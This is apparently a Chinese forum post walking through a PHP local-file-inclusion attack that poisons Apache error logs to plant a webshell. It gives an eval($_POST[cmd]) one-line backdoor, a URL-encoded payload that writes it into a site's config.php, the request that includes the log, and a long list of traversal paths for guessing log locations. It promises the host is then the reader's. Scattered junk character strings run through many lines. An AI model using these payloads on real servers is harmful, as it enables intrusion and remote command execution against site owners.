php包含apache日志写马

admin

因为上面那个很不实际，我在测试中发现日志动不动就是几十兆，那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用，也比上面那种慢的要死好很多。
, X/ s+ g; z1 e3 Q6 p  K
; k& |' ?; _  d4 v* j比如还是这句一句话木马
" J# v$ ^/ W+ B& r<?eval($_POST[cmd]);?>   

到这里你也许就想到了，这是个很不错的办法。接着看,如何写入就成了个问题，用这句，
; a/ a. _1 V9 F$ U0 k, _9 jfopen打开/home/virtual/www.xxx.com/forum/config.php这个文件，然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   //在config.php里写入一句木马语句

我们提交这句，再让Apache记录到错误日志里，再包含就成功写入shell,记得一定要转换成URL格式才成功。
7 E. k4 `- Q  ]2 @, R* q- p转换为
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
% m. `) ~6 ?; F3 @config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
& F  ]$ `3 }$ Y2 y! o6 o  dfclose%28%24fp%29%3B%3F%3E
我们提交
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
! r  J1 h) p6 M- w5 o7 {, ]9 M2 f%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
+ c1 Y+ z7 a0 C: h- }: D3 tcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
9 @: r/ L; w- z  m
. A" Z) o; r) E2 \/ E3 M这样就错误日志里就记录下了这行写入webshell的代码。
; h0 t4 B! n5 x/ S我们再来包含日志，提交
$ ^% n0 i$ _) _( ?! Z% A  ~# r- w9 O* Uhttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
4 X8 G) h7 n5 ^  f; ^* d4 L
0 d! A+ R% a( E$ b: p这样webshell就写入成功了，config.php里就写入一句木马语句
OK.
http://www.xxx.com/forum/config.php这个就成了我们的webshell
直接用lanker的客户端一连，主机就是你的了。
6 i6 d( G- f9 ?( K9 p! b3 k
9 U) w7 `, Z% q; HPS:上面讲的，前提是文件夹权限必须可写 ，一定要-rwxrwxrwx(777)才能继续，这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
  P+ w; E8 x6 G) u% m: y9 X
其他的日志路径，你可以去猜，也可以参照这里。
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
& _5 p& e, b( }../../../apache/logs/error.log
../../../apache/logs/access.log
, X7 h+ T4 N$ ^9 D../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
3 ^! v0 ^, ?+ S' F../../../../../../../../../../etc/httpd/logs/error_log
* q, b) `  m$ z! F. m& A../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
1 y6 m; `  H+ r, v$ d. C../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
1 v3 L7 Z' {( N../../../../../../../../../../usr/local/apache/logs/access.log
; E% ^$ N; }0 ~* k* h4 B0 x) L../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
1 u, i" B) `. W9 q8 L: D../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
  F: L0 E2 k) z( a4 _. x& ~/ w2 i../../../../../../../../../../usr/local/apache/logs/error.log
0 {. V- v# O2 f( Y1 K../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
* B; A( o& f" {/ q+ ^/ f../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log      
' F3 X0 A# c. H/var/log/httpd/error_log     
../apache/logs/error.log     
$ `/ s  L: P4 T../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
2 L  v" t( T, ?../../../apache/logs/error.log
# E" Y# U4 @( b; n" N../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
7 q8 w: d) m3 P, c# J; h/etc/httpd/logs/error_log
  l+ B! d" ~* \5 i% ]2 u% c/etc/httpd/logs/error.log
/var/www/logs/access_log
; a; A5 C4 B& B7 L) v% U2 ~/var/www/logs/access.log
/usr/local/apache/logs/access_log
' p$ x3 B8 O8 A' K9 t* ~/usr/local/apache/logs/access.log
3 s3 p( ?# U* |2 w& u: p/var/log/apache/access_log
7 o9 h7 r9 |( b/var/log/apache/access.log
/var/log/access_log
7 Q! Q+ M2 i( `6 a: Z4 ]5 K; O/var/www/logs/error_log
/var/www/logs/error.log
- L% r3 [" j* ~# Y/usr/local/apache/logs/error_log
# ]$ J: y! w4 f4 J& i/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
7 H3 m3 T) Y, w& B$ \% u% S: u/var/log/access_log
6 _( m+ ?8 t) c/var/log/error_log